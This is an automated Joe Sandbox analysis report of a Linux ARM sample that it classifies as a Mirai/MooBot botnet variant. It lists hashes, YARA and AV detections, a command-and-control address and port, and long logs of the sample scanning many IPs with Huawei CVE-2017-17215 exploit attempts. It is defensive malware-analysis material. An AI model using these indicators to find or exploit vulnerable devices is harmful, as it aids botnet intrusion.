Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
huhu.arm7.elf

Overview

General Information

Sample name:huhu.arm7.elf
Analysis ID:1382471
MD5:75cab5a9c644eaae1b53794f5bef0e01
SHA1:237f359b3e7f907b137ba7c25eb6e1757894edcf
SHA256:3a4bba3da6bc15f936391363febbfd79c031e72c6e22c53e551f63675e54c08d
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1382471
Start date and time:2024-01-29 07:06:01 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:huhu.arm7.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@1/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/huhu.arm7.elf
PID:6254
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 6269, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 6269, Parent: 1477, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 6277, Parent: 1320)
  • Default (PID: 6277, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6292, Parent: 1320)
  • Default (PID: 6292, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
huhu.arm7.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    huhu.arm7.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      huhu.arm7.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1a504:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a518:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a52c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a540:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a554:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a568:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a57c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a590:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a5f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a608:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a61c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a630:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a644:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a658:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a66c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a680:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1a694:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      6254.1.00007fdb48017000.00007fdb48034000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        6254.1.00007fdb48017000.00007fdb48034000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6254.1.00007fdb48017000.00007fdb48034000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1a504:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a518:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a52c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a540:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a554:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a568:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a57c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a590:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a5f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a608:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a61c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a630:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a644:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a658:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a66c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a680:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1a694:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: huhu.arm7.elf PID: 6254JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: huhu.arm7.elf PID: 6254Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x11465:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11479:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1148d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x114a1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x114b5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x114c9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x114dd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x114f1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11505:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11519:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1152d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11541:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11555:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11569:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1157d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11591:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x115a5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x115b9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x115cd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x115e1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x115f5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:45.142.182.123192.168.2.2319990509542030489 01/29/24-07:07:20.002905
            SID:2030489
            Source Port:19990
            Destination Port:50954
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.2.37.5655300372152829579 01/29/24-07:08:56.654234
            SID:2829579
            Source Port:55300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23191.61.254.18834794372152829579 01/29/24-07:08:04.473671
            SID:2829579
            Source Port:34794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2334.102.129.8449084372152835222 01/29/24-07:08:36.128305
            SID:2835222
            Source Port:49084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.2.37.5655300372152835222 01/29/24-07:08:56.654234
            SID:2835222
            Source Port:55300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23191.61.254.18834794372152835222 01/29/24-07:08:04.473671
            SID:2835222
            Source Port:34794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2334.102.129.8449084372152829579 01/29/24-07:08:36.128305
            SID:2829579
            Source Port:49084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2345.142.182.12350954199902030490 01/29/24-07:06:55.046464
            SID:2030490
            Source Port:50954
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: huhu.arm7.elfAvira: detected
            Source: huhu.arm7.elfReversingLabs: Detection: 50%
            Source: huhu.arm7.elfVirustotal: Detection: 42%Perma Link
            Source: huhu.arm7.elfString: /proc/proc/%d/cmdlinewgetcurlbusyboxechocatnano

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:50954 -> 45.142.182.123:19990
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 45.142.182.123:19990 -> 192.168.2.23:50954
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34794 -> 191.61.254.188:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34794 -> 191.61.254.188:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49084 -> 34.102.129.84:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49084 -> 34.102.129.84:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55300 -> 197.2.37.56:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55300 -> 197.2.37.56:37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 34794 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49084 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55300 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 55300
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 132.21.97.88:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.7.107.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.211.51.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.75.67.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.18.64.248:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.133.239.74:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.97.80.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.211.140.174:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.202.221.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.228.230.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.210.96.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.247.116.156:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 71.55.208.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.210.180.48:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.16.177.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 133.113.141.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 159.64.103.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.165.122.147:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.84.147.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.148.94.92:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 190.220.159.148:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.110.91.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.200.207.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.192.74.147:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 20.235.207.195:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.93.212.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.231.149.255:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.238.30.148:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.212.204.175:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.74.39.1:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 166.246.70.125:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.77.203.201:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.69.241.58:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.133.231.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 45.75.148.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.14.50.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.103.5.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.185.74.177:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.187.200.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.251.182.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 199.45.131.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.34.161.157:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 77.4.59.31:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.108.161.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.229.241.24:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.92.179.180:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.50.90.84:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.243.134.220:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.40.117.54:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.105.28.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.28.19.242:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.187.202.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 20.10.87.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.85.95.244:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 150.102.235.155:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.240.236.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 186.158.219.152:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.12.208.183:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.15.192.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.232.150.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.3.21.88:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.114.13.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.10.228.20:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.62.32.87:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.131.149.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.104.138.200:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.100.97.101:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.49.154.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.38.49.38:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.17.42.159:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.64.83.143:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.92.29.44:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.114.242.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.178.123.111:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.166.190.175:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 203.149.45.7:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.178.132.194:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.82.62.247:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.116.30.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.211.49.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.143.200.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.160.62.9:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.211.149.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.34.94.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 123.125.50.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.239.112.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.67.124.84:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.175.184.247:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.197.21.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.153.27.106:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 200.106.129.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 168.205.80.67:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.82.91.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 64.110.23.107:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.252.7.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.52.243.31:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.139.69.111:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.24.37.106:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.98.83.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 57.224.115.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.246.154.251:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 117.209.125.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.51.41.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.103.141.248:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.65.134.116:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.151.235.210:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 58.35.230.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 106.248.112.194:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.162.67.58:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.139.146.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 69.25.169.76:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 106.237.48.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.238.182.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.120.206.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.129.39.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.85.30.59:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.132.2.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.5.138.148:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.201.147.148:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.189.50.40:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 208.179.18.112:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.213.138.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.109.9.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.70.122.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.97.180.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.233.229.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.125.31.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.239.11.48:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.6.220.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 121.64.225.12:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.172.130.12:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.45.197.252:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.106.57.169:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.39.26.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.38.67.202:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 145.228.233.233:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 157.183.94.57:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.170.57.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 194.53.138.113:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.105.99.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.74.198.39:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.244.208.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 197.37.25.187:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.121.99.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:54044 -> 41.231.40.4:37215
